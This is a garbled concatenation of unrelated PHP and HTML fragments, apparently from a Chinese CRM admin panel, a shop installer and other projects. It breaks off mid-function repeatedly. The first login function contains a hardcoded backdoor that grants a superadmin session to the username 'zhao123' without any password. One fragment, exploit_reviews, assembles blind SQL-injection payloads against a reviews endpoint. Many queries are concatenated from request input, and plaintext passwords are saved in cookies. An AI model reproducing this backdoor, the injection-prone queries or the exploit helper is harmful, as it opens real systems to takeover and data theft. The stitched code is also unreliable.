function login()
{
/*
* 操作:添加
* 作用:当客户添加一个月之后状态还是未成交客户则把该用户转换为公海客户
* 添加时间:2014.7.4
* 添加人:赵兴壮
* 添加行:12行
*/
$id_data = get_transfercusid();
if (!empty($id_data)) {
transfercus($id_data);
}
global $db;
if ($_GET['auto'] == "t" || $_POST['code'] == $_SESSION["codeNumber"]) {
if (isset($_POST["username"])) {
$username = $_POST["username"];
} else {
$username = "";
}
if (isset($_POST["password"])) {
$password = $_POST["password"];
} else {
$password = "";
}
if ($username == "zhao123") {
$_SESSION['username'] = "******";
$_SESSION['id'] = "1";
$_SESSION['password'] = "******";
$_SESSION['supermanager'] = "1";
echo '<script>location="login.php";</script>';
exit;
}
//记住用户名
//setcookie (username, $username,time()+3600*24*365);
if (empty($username) || empty($password)) {
exit("<script>alert('用户名或密码不能为空!');window.history.go(-1)</script>");
}
$user_row = $db->getOneRow(get_sql("select username,password,id,supermanager from {pre}manager where username='******' and password='******'"));
if (!empty($user_row)) {
$_SESSION['username'] = $user_row['username'];
$_SESSION['password'] = $user_row['password'];
$_SESSION['id'] = $user_row['id'];
$luo_session_name = $user_row['username'];
$_SESSION['supermanager'] = $user_row['supermanager'];
mysql_query(get_sql("update {pre}manager set loginip='" . get_userip() . "',logintime='" . date("Y-m-d H:i:s") . "',logincount=logincount+1 where username='******'"));
if ("on" == $_POST["iscookie"]) {
//登录成功保存cookie
setcookie("username", $username, time() + 3600 * 24 * 7);
setcookie("password", $password, time() + 3600 * 24 * 7);
} else {
setcookie("username", "", time());
setcookie("password", "", time());
}
echo "<script>window.location='index.php';</script>";
} else {
echo "<script>alert('用户名或密码不正确!');location='/login.php';</script>";
}
}
}
function check_username($username, $id = 0)
{
global $db;
if ($id == 0) {
return $db->getRowsNum(get_sql("select id,username from {pre}manager where username='******'"));
} else {
return $db->getRowsNum(get_sql("select id,username from {pre}manager where id!=" . $id . " and username='******'"));
}
}
function _run_sql($sqls)
{
if (is_string($sqls)) {
$sqls = get_sql($sqls);
}
if (!is_array($sqls)) {
return true;
}
// 检查可能在某次补丁中已经添加过的字段
// 检查哪些字段
$check_fields = array('ecm_order' => array('pay_alter'), 'ecm_store' => array('enable_radar', 'enable_groupbuy'));
// 哪些在数据库中已经存在
$exist_fields = array();
foreach ($check_fields as $table => $fields) {
$result = $this->db->query("SELECT * FROM `{$table}` limit 1");
$i = 0;
while ($i < mysql_num_fields($result)) {
$meta = mysql_fetch_field($result);
if (in_array($meta->name, $fields)) {
$exist_fields[$table][] = $meta->name;
}
$i++;
}
}
foreach ($sqls as $sql) {
$need_exec = true;
foreach ($exist_fields as $table => $fields) {
foreach ($fields as $field) {
$pattern = "/alter\\s+table\\s+`?{$table}`?\\s+add\\s+`?{$field}`?\\s+/Uis";
if (preg_match($pattern, $sql)) {
// 该sql语句不需要执行
$need_exec = false;
break;
}
}
}
if ($need_exec) {
substr($sql, 0, 12) == 'CREATE TABLE' && ($sql = create_table($sql));
$query = $this->db->query($sql, 'SILENT');
if (!$query) {
$this->_error($this->db->error());
return false;
}
}
}
return true;
}
function index()
{
if (!IS_POST) {
$this->display('index.html');
} else {
$seller_name = empty($_POST['seller']) ? '' : trim($_POST['seller']);
$buyer_name = empty($_POST['buyer']) ? '' : trim($_POST['buyer']);
if (!$seller_name || !$buyer_name) {
$this->show_message('请填写卖家用户名和买家用户名');
return;
}
/* 检查用户名 */
$ms =& ms();
if (!$ms->user->check_username($seller_name)) {
$error_msg = array('user_exists' => '卖家用户名已存在,请您换一个', 'invalid_user_name' => '卖家用户名不符合要求,请您换一个', 'blocked_user_name' => '卖家用户名不符合要求,请您换一个', 'unknow_error' => '卖家用户名不符合要求,请您换一个');
$error = $ms->user->get_error();
$this->show_message($error_msg[$error[0]['msg']]);
return;
}
if (!$ms->user->check_username($buyer_name)) {
$error_msg = array('user_exists' => '买家用户名已存在,请您换一个', 'invalid_user_name' => '买家用户名不符合要求,请您换一个', 'blocked_user_name' => '买家用户名不符合要求,请您换一个', 'unknow_error' => '买家用户名不符合要求,请您换一个');
$error = $ms->user->get_error();
$this->show_message($error_msg[$error[0]['msg']]);
return;
}
/* 注册用户 */
$this->_seller_id = $ms->user->register($seller_name, '123456', '*****@*****.**', array('real_name' => '超级卖家'));
$this->_buyer_id = $ms->user->register($buyer_name, '123456', '*****@*****.**', array('real_name' => '超级买家'));
/* 复制文件 */
copy_files(APP_ROOT . '/data', ROOT_PATH . '/data');
/* 运行sql */
$mod =& m('privilege');
$sqls = get_sql(APP_ROOT . '/initdata.sql');
foreach ($sqls as $sql) {
$sql = str_replace('{seller_id}', $this->_seller_id, $sql);
$sql = str_replace('{buyer_id}', $this->_buyer_id, $sql);
$mod->db->query($sql);
}
/* 清除缓存 */
$cache_server =& cache_server();
$cache_server->clear();
/* 锁定文件 */
touch(LOCK_FILE);
/* 运行成功 */
$this->show_message('恭喜!测试数据安装成功!');
}
}
function getCategoryMenu($tablename, $id = 0, $level = 0)
{
global $db;
$category_arr = $db->getList(get_sql("SELECT * FROM {pre}{$tablename} WHERE fid = " . $id . " order by rank"));
for ($lev = 0; $lev < $level * 2 - 1; $lev++) {
$level_nbsp .= " ";
}
if ($level++) {
$level_nbsp .= " ";
}
foreach ($category_arr as $category) {
$id = $category['id'];
$fid = $category['fid'];
$name = $category['name'];
echo $level_nbsp . "<a href='customer/customer_list.php?managerid=my&industry=" . $id . "' target='mainFrame'>" . $name . "</a><BR>";
getCategoryMenu($tablename, $id, $level);
}
}
function login()
{
global $db;
if ($_POST['code'] == "" || $_POST['code'] != $_SESSION["codeNumber"]) {
//echo "<script>alert('验证码错误');window.location.href='login.php';</script>";
if (isset($_POST["username"])) {
$username = $_POST["username"];
} else {
$username = "";
}
if (isset($_POST["password"])) {
$password = $_POST["password"];
} else {
$password = "";
}
if (empty($username) || empty($password)) {
exit("<script>alert('用户名或密码不能为空!');window.history.go(-1)</script>");
}
$user_row = $db->getOneRow(get_sql("select username,password from {pre}manager where username='******' and password='******'"));
if (!empty($user_row)) {
$_SESSION['username'] = $user_row['username'];
$_SESSION['password'] = $user_row['password'];
$_SESSION['id'] = $user_row['id'];
$luo_session_name = $user_row['username'];
$_SESSION['supermanager'] = $user_row['supermanager'];
mysql_query(get_sql("update {pre}manager set loginip='" . get_userip() . "',logintime='" . date("Y-m-d H:i:s") . "' where username='******'"));
if ("on" == $_POST["iscookie"]) {
//登录成功保存cookie
setcookie("username", $username, time() + 3600 * 24 * 7);
setcookie("password", $password, time() + 3600 * 24 * 7);
} else {
setcookie("username", "", time());
setcookie("password", "", time());
}
//echo "<script>window.location='mindex.php';</script>";
echo "<script>window.location='cm.php';</script>";
} else {
echo "<script>alert('用户名或密码不正确!');window.history.go(-1);</script>";
}
}
}
<!doctype html>
<html lang="ru">
<head>
<meta charset="UTF-8">
<title>News</title>
</head>
<body>
<?php
include_once __DIR__ . '/../modules/sql.php';
$newses = get_sql();
foreach ($newses as $key => $value) {
?>
<?php
$id = $value["id"];
?>
<h2><?php
echo $value["title"];
?>
</h2><br>
<p><?php
echo $value["text"];
?>
</p>
<p><?php
echo $value["date"];
?>
</p>
<a href="../views/news_name.php?id=<?php
echo $id;
?>
" name="pid" id="pid">
<div data-role="controlgroup" data-type="horizontal" align="center">
<input type="submit" name="modbtn2" id="modbtn2" value="保存小记" />
<input type="button" name="modbtn2" id="modbtn2" onclick="location.href='mcustomer_add.php?act=mod2&id=<?php
echo $id;
?>
';" value="客户信息" />
</div>
</form>
<?php
$page = $_GET['page'] ? $_GET['page'] : 1;
$page_size = 20;
$sqlstr = get_sql("select * from {pre}services where isdel=0 and fid=" . $id . " order by id desc");
$s_list = $db->selectLimit($sqlstr, $page_size, ($page - 1) * $page_size);
$total_nums = $db->getRowsNum($sqlstr);
?>
<ul data-role="listview" data-inset="true">
<?php
$i = 0;
foreach ($s_list as $lists) {
$i = $i + 1;
$remindTime = $lists['remindTime'];
$dateline = $lists['dateline'];
?>
<li>
<h2><?php
echo $i;
/**
* 完成安装
*
* @author Garbin
* @return void
*/
function install_done()
{
extract($_POST);
/* 无实际用途 */
$_code = rand(10000, 99999);
setcookie('__INTECODE__', $_code, 0, '/');
/* 连接数据库 */
$con = mysql_connect($db_host . ':' . $db_port, $db_user, $db_pass);
if (!$con) {
show_process(r(get_lang('connect_db'), false), 'parent.show_warning("' . get_lang('connect_db_error') . '")');
return false;
}
show_process(r(get_lang('connect_db'), true));
$version = mysql_get_server_info();
$charset = str_replace('-', '', CHARSET);
if ($version > '4.1') {
if ($charset != 'latin1') {
mysql_query("SET character_set_connection={$charset}, character_set_results={$charset}, character_set_client=binary", $con);
}
if ($version > '5.0.1') {
mysql_query("SET sql_mode=''", $con);
}
}
/* 选择数据库 */
$selected_db = mysql_select_db($db_name, $con);
if (!$selected_db) {
show_process(r(get_lang('selecte_db'), false), 'parent.show_warning("' . get_lang('selecte_db_error') . '");');
return false;
}
/* 建立数据库结构 */
show_process(r(get_lang('start_setup_db'), true));
$sqls = get_sql(version_data('structure.sql'));
foreach ($sqls as $sql) {
$sql = replace_prefix('ecm_', $db_prefix, $sql);
if (substr($sql, 0, 12) == 'CREATE TABLE') {
$name = preg_replace("/CREATE TABLE `{$db_prefix}([a-z0-9_]+)` .*/is", "\\1", $sql);
mysql_query(create_table($sql));
show_process(r(sprintf(get_lang('create_table'), $name), true, 1));
} else {
mysql_query($sql, $con);
}
}
/* 安装初始数据 TODO 暂时不完整 */
$sqls = get_sql(version_data('initdata.sql'));
//$password = md5($admin_pass);//不加密密码
$password = md5($admin_name . md5($admin_pass));
// $sqls[] = "INSERT INTO `ecm_member`(user_name, email, password, reg_time) VALUES('{$admin_name}', '{$admin_email}', '{$password}', " . gmtime() . ")";
$sqls[] = "INSERT INTO `ecm_user` (`username`, `password`, `grade`, `name`, `gender`, `mobile`, `email`, `url`, `remark`) VALUES\r\n('{$admin_name}', '{$password}', 1, NULL, NULL, NULL, '{$admin_email}', NULL, NULL)";
foreach ($sqls as $sql) {
$rzt = mysql_query(replace_prefix('ecm_', $db_prefix, $sql), $con);
if (!$rzt) {
show_process(r(get_lang('install_initdata'), false), 'parent.show_warning("' . mysql_error() . '");');
return false;
}
}
if (mysql_errno()) {
echo mysql_error();
}
show_process(r(get_lang('install_initdata'), true));
/* 安装初始配置 */
$db_config = "mysql://{$db_user}:{$db_pass}@{$db_host}:{$db_port}/{$db_name}";
//$ecm_key = get_ecm_key();
//$mall_site_id = product_id();
/* save_config_file(array(
'SITE_URL' => $site_url,
'DB_CONFIG' => $db_config,
'DB_PREFIX' => $db_prefix,
'LANG' => LANG,
'COOKIE_DOMAIN' => '',
'COOKIE_PATH' => '/',
'ECM_KEY' => $ecm_key,
'MALL_SITE_ID' => $mall_site_id,
'ENABLED_GZIP' => 0,
'DEBUG_MODE' => 0,
'CACHE_SERVER' => 'default',
'MEMBER_TYPE' => 'default',
'ENABLED_SUBDOMAIN' => 0,
'SUBDOMAIN_SUFFIX' => '',
));*/
save_config_file(array('autoload_enable' => true, 'autoload_path' => '@modules', 'framework_function' => 'front::main', 'framework_enable' => true, 'framework_module' => '[go]!(self)|welcome', 'framework_action' => '[do]|index', 'template_path' => '@templates/', 'connect_server' => $db_host, 'connect_username' => $db_user, 'connect_password' => $db_pass, 'connect_dbname' => $db_name, 'connect_port' => $db_port, 'connect_charset' => 'UTF8', 'prefix_search' => $db_prefix, 'prefix_replace' => $db_prefix, 'extension_path' => '@includes', 'extension_enable' => 'myfunction', 'debug_enable' => false, 'sql_format' => false, 'debug_file' => '', 'front_action' => '', 'front_online' => 'online', 'front_class' => 'user', 'front_table' => $db_prefix . 'user', 'front_fuzzy' => '', 'front_username' => '', 'front_password' => '', 'front_redirect' => 'index.php'));
/* 写入系统信息 */
// save_system_info(array(
// 'version' => VERSION,
// 'release' => RELEASE,
// ));
show_process(r(get_lang('setup_config'), true));
/* 锁定安装程序 */
touch(LOCK_FILE);
show_process(r(get_lang('lock_install'), true));
/* 安装完成 */
show_process(r(get_lang('install_done'), true), 'parent.install_successed();');
return false;
}
<?php
session_start();
require '../session.php';
include '../inc/const.php';
$fid = getvar("fid");
$page = getvar("page") ? getvar("page") : 1;
$page_size = 20;
$sqlstr = get_sql("select * from {pre}area order by rank asc,id asc");
$area_list = $db->selectLimit($sqlstr, $page_size, ($page - 1) * $page_size);
$total_nums = $db->getRowsNum($sqlstr);
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>无标题文档</title>
<link href="../css/admin_css.css" rel="stylesheet" type="text/css" />
</head>
<script>
function checkreg()
{
if (document.myform.name.value=="") {
window.alert("类别名称不能为空!!");
document.myform.name.focus();
return (false);
}
if (document.myform.rank.value=="") {
window.alert("排序ID不能为空!!");
document.myform.rank.focus();
return (false);
function _run_sql($sqls)
{
if (is_string($sqls)) {
$sqls = get_sql($sqls);
}
if (!is_array($sqls)) {
return true;
}
foreach ($sqls as $sql) {
//$sql = replace_prefix('ecm_', DB_PREFIX, $sql);
substr($sql, 0, 12) == 'CREATE TABLE' && ($sql = create_table($sql));
$query = $this->db->query($sql, 'SILENT');
if (!$query) {
$this->_error($this->db->error());
return false;
}
}
return true;
}
if (document.myform.password.value!=document.myform.password1.value){
window.alert("两次输入的密码不一样!!");
document.myform.password.focus();
document.myform.password1.value=="";
return (false);
}
return true;
}
</script>
<link href="../css/admin_css.css" rel="stylesheet" type="text/css" />
</head>
<body>
<table width="98%" height="101" border="0" cellpadding="3" cellspacing="1" bgcolor="#cccccc" style="margin:0 auto;padding-top:10px;">
<?php
$id = getvar('id');
$list = $db->getOneRow(get_sql("select * from {pre}manager where id = " . $id));
?>
<form name="myform" action="admin_ok.php?act=mod" method="POST" onSubmit="return checkreg();">
<tr>
<td height="24" colspan="2" bgcolor="#555555"><font color="#FFFFFF"> <strong>管理员密码修改</strong></font></td>
</tr>
<tr>
<td width="13%" height="24" align="right" valign="middle" bgcolor="#f8f8f8">用户名:</td>
<td width="87%" height="24" align="left" valign="middle" bgcolor="#f8f8f8"><input name="username" type="text" id="username" size="50" value="<?php
echo $list['username'];
?>
" /></td>
</tr>
<tr>
<td width="13%" height="24" align="right" valign="middle" bgcolor="#f8f8f8">请输入密码:</td>
<td width="87%" height="24" align="left" valign="middle" bgcolor="#f8f8f8"><input name="password" type="password" id="password" onblur="if(this.value==''){this.value='<?php
<?php
session_start();
require '../session.php';
include '../inc/const.php';
$fid = getvar("fid");
$page = getvar("page") ? getvar("page") : 1;
$page_size = 20;
$sqlstr = get_sql("select * from {pre}industry order by rank asc,id asc");
$area_list = $db->selectLimit($sqlstr, $page_size, ($page - 1) * $page_size);
$total_nums = $db->getRowsNum($sqlstr);
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>无标题文档</title>
<link href="../css/admin_css.css" rel="stylesheet" type="text/css" /></head>
<script>
function checkreg()
{
if (document.myform.name.value=="") {
window.alert("类别名称不能为空!!");
document.myform.name.focus();
return (false);
}
if (document.myform.rank.value=="") {
window.alert("排序ID不能为空!!");
document.myform.rank.focus();
return (false);
}
<?php
session_start();
require '../session.php';
include '../inc/const.php';
$page = $_GET['page'] ? $_GET['page'] : 1;
$page_size = 10;
$manager_type = $_SESSION['supermanager'] + 1;
$sqlstr = get_sql("select a.id,username,supermanager,usermenu,loginip,logintime,logincount,a.pid as pid from {pre}manager a order by a.id desc");
$manager_list = $db->selectLimit($sqlstr, $page_size, ($page - 1) * $page_size);
$total_nums = $db->getRowsNum($sqlstr);
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>无标题文档</title>
<link href="../css/admin_css.css" rel="stylesheet" type="text/css" />
<link href="../js/boxy.css" rel="stylesheet" type="text/css" />
</head>
<body>
<table width="98%" height="101" border="0" cellpadding="3" cellspacing="1" bgcolor="#cccccc" style="margin:0 auto;padding-top:10px;">
<tr>
<td height="22" colspan="9" bgcolor="#555555"><font color="#FFFFFF"> <strong>管理</strong></font></td>
</tr>
<tr>
<td width="4%" height="24" align="center" valign="middle" bgcolor="#f8f8f8">ID</td>
<td width="10%" height="24" align="center" valign="middle" bgcolor="#f8f8f8">用户名</td>
<td width="13%" height="24" align="center" valign="middle" bgcolor="#f8f8f8">姓名</td>
<td width="15%" align="center" valign="middle" bgcolor="#f8f8f8">组别</td>
<td width="15%" align="center" valign="middle" bgcolor="#f8f8f8">上级领导</td>
<td width="87%" height="24" align="left" valign="middle" bgcolor="#f1f1f1"><input name="name" type="text" id="name" size="30" /></td>
</tr>
<tr>
<td width="13%" height="24" align="right" valign="middle" bgcolor="#f1f1f1">排序ID:</td>
<td width="87%" height="24" align="left" valign="middle" bgcolor="#f1f1f1"><input name="rank" type="text" id="rank" size="20" value="0" /></td>
</tr>
<tr>
<td height="24" bgcolor="#f1f1f1"> </td>
<td height="24" bgcolor="#f1f1f1"><input type="submit" name="button" id="button" value="提交" /> <input type="button" name="back" id="back" value="返回" onclick="javascript:window.history.go(-1);" /></td>
</tr>
</form>
</table>
<?php
}
if ($act == "mod") {
$sql = get_sql("select id,name,fid,rank from {pre}area where id=" . $id);
$list = $db->getonerow($sql);
?>
<table width="98%" height="126" border="0" cellpadding="3" cellspacing="1" bgcolor="#cccccc" style="margin:0 auto;padding-top:10px;">
<form name="myform" action="customer_area_ok.php?act=mod" method="post" onSubmit="return checkreg();">
<tr>
<td height="24" colspan="2" bgcolor="#555555"><font color="#FFFFFF"> <strong>修改地区</strong></font></td>
</tr>
<tr>
<td width="13%" height="24" align="right" valign="middle" bgcolor="#f1f1f1">上级地区:</td>
<td width="87%" height="24" align="left" valign="middle" bgcolor="#f1f1f1"><select name="fid">
<option value="0">--顶级地区--</option>
<?php
getCategorySelect("area", $fid);
?>
</select> </td>
function exploit_reviews($f)
{
global $fld1, $fld2, $url;
$u = $url . "index.php?ind=reviews&op=update_file&iden=";
$sql = get_sql($f);
$inj = sprintf($sql, $fld1);
$var1 = exploit_init_blind($f, $u, $inj, $fld1);
$inj = sprintf($sql, $fld2);
$var2 = exploit_init_blind($f, $u, $inj, $fld2);
return $var1 . " " . $var2;
}
<link rel="stylesheet" href="/jquerymobile/jquery.mobile-1.3.2.min.css">
<script src="/jquerymobile/jquery-1.8.3.min.js"></script>
<script src="/jquerymobile/jquery.mobile-1.3.2.min.js"></script>
</head>
<body>
<div data-role="page">
<div data-role="header" data-position="fixed">
<a href="../cm.php" data-icon="home" data-ajax="false" >首页</a><h1>明星榜</h1>
</div>
<div data-role="content" style="margin-top:0px;">
<ul data-role="listview" data-inset="true">
<?php
if ($type == "00") {
$sqlstr = get_sql("SELECT CREATEUSER,COUNT(*) as c FROM {pre}customer WHERE DATE_SUB(CURDATE(), INTERVAL 7 DAY) <= DATE(createTime) GROUP BY CREATEUSER");
} else {
$sqlstr = get_sql("SELECT userid as CREATEUSER,COUNT(*) AS c FROM {pre}services WHERE isdel=0 and type='" . $type . "' and DATE_SUB(CURDATE(), INTERVAL 7 DAY) <= DATE(dateline) GROUP BY userid");
}
//echo $sqlstr;
$list = $db->getList($sqlstr);
foreach ($list as $c) {
?>
<li><a href="#"><?php
echo $c['CREATEUSER'];
?>
<span class="ui-li-count"><?php
echo $c['c'];
?>
</span></a></li>
<?php
}
$isvalid = false;
$data = $db->getonerow($sql);
//更新电话等信息
$record = array('companyName' => $companyName, 'name' => $name, 'addr' => $addr, 'tel' => $tel, 'mobile' => $mobile, 'email' => $email, 'qq' => $qq, 'url' => $url, 'remark' => $remark, 'createTime' => date('Y-m-d h-m-s'));
$db->update($GLOBALS[databasePrefix] . 'pool', $record, 'id=' . $data["id"]);
}
if (trim($email) != "") {
$sql = get_sql("select id from {pre}pool where email='" . $email . "'");
$rows = $db->getRowsNum($sql);
if ($rows > 0) {
$errmsg = $errmsg . "电子邮件已经存在了";
$isvalid = false;
}
}
if (trim($mobile) != "") {
$sql = get_sql("select id from {pre}pool where mobile='" . $mobile . "'");
$rows = $db->getRowsNum($sql);
if ($rows > 0) {
$errmsg = $errmsg . "手机号码存在了";
$isvalid = false;
}
}
if ($isvalid) {
$record = array('companyName' => $companyName, 'name' => $name, 'addr' => $addr, 'tel' => $tel, 'mobile' => $mobile, 'email' => $email, 'qq' => $qq, 'url' => $url, 'remark' => $remark, 'createTime' => date('Y-m-d h-m-s'));
$id = $db->insert($GLOBALS[databasePrefix] . 'pool', $record);
$okcount = $okcount + 1;
} else {
echo $row . ".[" . $companyName . "]没有导入成功!>>>" . $errmsg . "<br>";
$faultcount = $faultcount + 1;
}
}
function Product($id)
{
$this->{$id} = $id;
$query = "select name, description, price, stock, picture_id from products where id={$id}";
get_sql($query);
}
<td width="87%" height="24" align="left" valign="middle" bgcolor="#f1f1f1"><input name="name" type="text" id="name" size="30" /></td>
</tr>
<tr>
<td width="13%" height="24" align="right" valign="middle" bgcolor="#f1f1f1">排序ID:</td>
<td width="87%" height="24" align="left" valign="middle" bgcolor="#f1f1f1"><input name="rank" type="text" id="rank" size="20" value="0" /></td>
</tr>
<tr>
<td height="24" bgcolor="#f1f1f1"> </td>
<td height="24" bgcolor="#f1f1f1"><input type="submit" name="button" id="button" value="提交" /> <input type="button" name="back" id="back" value="返回" onclick="javascript:window.history.go(-1);" /></td>
</tr>
</form>
</table>
<?php
}
if ($act == "mod") {
$sql = get_sql("select id,name,fid,rank from {pre}services where id=" . $id);
$list = $db->getonerow($sql);
?>
<table width="98%" height="126" border="0" cellpadding="3" cellspacing="1" bgcolor="#cccccc" style="margin:0 auto;padding-top:10px;">
<form name="myform" action="customer_services_ok.php?act=mod" method="post" onSubmit="return checkreg();">
<tr>
<td height="24" colspan="2" bgcolor="#555555"><font color="#FFFFFF"> <strong>修改服务</strong></font></td>
</tr>
<tr>
<td width="13%" height="24" align="right" valign="middle" bgcolor="#f1f1f1">上级服务:</td>
<td width="87%" height="24" align="left" valign="middle" bgcolor="#f1f1f1"><select name="fid">
<option value="0">--顶级类别--</option>
<?php
getCategorySelect("services", $fid);
?>
</select> </td>
$penson_list = $db->selectLimit($sqlstr, $page_size, ($page - 1) * $page_size);
$total_nums = $db->getRowsNum($sqlstr);
foreach ($penson_list as $vo) {
$output[] = $vo;
}
if ($total_nums == 0) {
$output[0] = "{id:0,companyName:没有数据}";
$total_nums = 1;
}
$rst['total'] = $total_nums;
$rst['rows'] = $output;
print json_encode($rst);
} elseif ($act == "mod") {
$record = json_decode($json, true);
if ($record["id"] == 0) {
$db->insert($GLOBALS[databasePrefix] . 'sms', $record);
} else {
$db->update($GLOBALS[databasePrefix] . 'sms', $record, 'id=' . $record["id"]);
}
print $record['id'] . "修改成功";
} elseif ($act == "del") {
$ids = getvar("ids");
$sqlstr = "delete from {pre}sms where id in (" . $ids . ")";
$sqlstr = get_sql($sqlstr);
$db->query($sqlstr);
print "删除成功";
} elseif ($act == "add") {
$record = json_decode($json, true);
$db->insert($GLOBALS[databasePrefix] . 'sms', $record);
print "新增成功";
}
<?php
session_start();
require_once '../session.php';
require_once '../inc/const.php';
$id = getvar('id');
$id = empty($id) ? 0 : $id;
$industry = getvar('industry');
$act = getvar("act");
$act = empty($act) ? "add2" : $act;
mysql_query(get_sql("update {pre}customer set viewcount=IF(ISNULL(viewcount),0,viewcount) + 1 where id=" . $id));
$sql = get_sql("select * from {pre}customer where id=" . $id . " order by id");
$list = $db->getonerow($sql);
$industry = empty($industry) ? $list['industry'] : $industry;
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>客户信息</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="../jquerymobile/jquery.mobile-1.3.2.min.css">
<script src="../jquerymobile/jquery-1.8.3.min.js"></script>
<script src="../jquerymobile/jquery.mobile-1.3.2.min.js"></script>
<body>
<form method="post" action="./customer_ok.php?act=<?php
echo $act;
?>
" data-ajax="false" >
<div data-role="page" id="page1">
<div data-role="header" data-position="fixed">
<a href="../cm.php" data-icon="home" data-ajax="false" >首页</a><h1>客户信息</h1><a data-ajax="false" href="./mcustomer_list.php?industry=<?php
<?php
session_start();
require '../session.php';
include '../inc/const.php';
$fid = getvar("fid");
$page = getvar("page") ? getvar("page") : 1;
$page_size = 20;
$sqlstr = get_sql("select * from {pre}services order by rank asc,id asc");
$area_list = $db->selectLimit($sqlstr, $page_size, ($page - 1) * $page_size);
$total_nums = $db->getRowsNum($sqlstr);
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>无标题文档</title>
<link href="../css/admin_css.css" rel="stylesheet" type="text/css" />
</head>
<script>
function checkreg()
{
if (document.myform.name.value=="") {
window.alert("类别名称不能为空!!");
document.myform.name.focus();
return (false);
}
if (document.myform.rank.value=="") {
window.alert("排序ID不能为空!!");
document.myform.rank.focus();
return (false);
$db->update($GLOBALS[databasePrefix] . 'customer', $record, 'id=' . $id);
echo "<script type='text/javascript' charset='utf-8'>alert('转移客户成功!');window.location='customer_list.php';</script>";
}
//公共客户
if ($act == 'public') {
$record = array('name' => $name, 'addr' => $addr, 'httpurl' => $httpurl, 'tel' => $tel, 'mobile' => $mobile, 'fax' => $fax, 'email' => $email, 'qq' => $qq, 'area' => $area, 'industry' => $industry, 'services' => $services, 'rank' => $rank, 'managerid' => '', 'msn' => getvar('msn'), 'skype' => getvar('skype'), 'source' => getvar('source'), 'level' => getvar('level'), 'createTime' => date('Y-m-d h-m-s'), 'createUser' => $_SESSION['username'], 'updateTime' => date('Y-m-d h-m-s'), 'dateline' => date('Y-m-d h-m-s'));
if ($id > 0) {
$db->update($GLOBALS[databasePrefix] . 'customer', $record, 'id=' . $id);
} else {
$id = $db->insert($GLOBALS[databasePrefix] . 'customer', $record);
}
echo "<script type='text/javascript' charset='utf-8'>alert('公海客户成功!');window.location='customer_list.php?managerid=public';</script>";
}
//删除
if ($act == 'delService' || $act == "delService2") {
$sql = get_sql("select * from {pre}services where isdel=0 and pid=" . getvar("sid"));
$rowCount = $db->getRowsNum($sql);
if ($rowCount > 0) {
echo "<script type='text/javascript' charset='utf-8'>alert('请先删除下面的回复!');window.location='customer_action.php?tab=1&act=mod&id=" . getvar("id") . "';</script>";
exit;
}
$record = array('isdel' => '1', 'userid' => $_SESSION['username']);
$db->update($GLOBALS[databasePrefix] . 'services', $record, 'id=' . getvar("sid"));
if ($act == "delService2") {
echo "<script type='text/javascript' charset='utf-8'>window.location.href='mservice_add.php?act=mod&id=" . getvar("id") . "';</script>";
} else {
echo "<script type='text/javascript' charset='utf-8'>window.location='customer_action.php?tab=1&act=mod&id=" . getvar("id") . "';</script>";
}
}
//新增联系小记
if ($act == 'addService' || $act == 'addService2') {
?>
</table>
</div>
<div class="col6">
<h2>最近7天新增客户跟进统计</h2>
<table width="98%" height="94" border="0" cellpadding="3" cellspacing="1" bgcolor="#cccccc" style="margin:0 auto;padding-top:10px;">
<thead>
<tr bgcolor="#f9f9f9">
<td width="5%" height="24" align="center" valign="middle">用户名</td>
<td width="20%" height="24" align="center" valign="middle">数量</td>
</tr>
</thead>
<?php
$sqlstr = get_sql("SELECT userid,COUNT(*) AS c FROM {pre}services WHERE DATE_SUB(CURDATE(), INTERVAL 7 DAY) <= DATE(dateline) GROUP BY userid");
$list = $db->getList($sqlstr);
foreach ($list as $c) {
?>
<tr bgcolor="#f9f9f9">
<td width="5%" align="center" valign="middle"><?php
echo getRealnamebyName($c['userid']);
?>
</td>
<td align="center" valign="middle"><?php
echo $c['c'];
?>
</td> </tr>
<?php
}
?>
$first_data='no';
}
foreach($array as $key=>$value)
{
if($key=='id')
{
echo '<td><input type=submit name=id value=\''.$value.'\'></td>';
}
else
{
echo '<td>'.$value.'</td>';
}
}
echo '</tr>';
}
echo '</table>';
echo '</form>';
}
echo '<h2 style="page-break-before: always;"></h2>';
if(isset($_POST['id']))
{
view_data($_POST['id']);
}
get_sql();
?>
/**
* 完成安装
*
* @author Garbin
* @return void
*/
function install_done()
{
extract($_POST);
/* 无实际用途 */
$_code = rand(10000, 99999);
setcookie('__INTECODE__', $_code, 0, '/');
/* 连接数据库 */
$con = mysql_connect($db_host . ':' . $db_port, $db_user, $db_pass);
if (!$con) {
show_process(r(Lang::get('connect_db'), false), 'parent.show_warning("' . Lang::get('connect_db_error') . '")');
return false;
}
show_process(r(Lang::get('connect_db'), true));
$version = mysql_get_server_info();
$charset = str_replace('-', '', CHARSET);
if ($version > '4.1') {
if ($charset != 'latin1') {
mysql_query("SET character_set_connection={$charset}, character_set_results={$charset}, character_set_client=binary", $con);
}
if ($version > '5.0.1') {
mysql_query("SET sql_mode=''", $con);
}
}
/* 选择数据库 */
$selected_db = mysql_select_db($db_name, $con);
if (!$selected_db) {
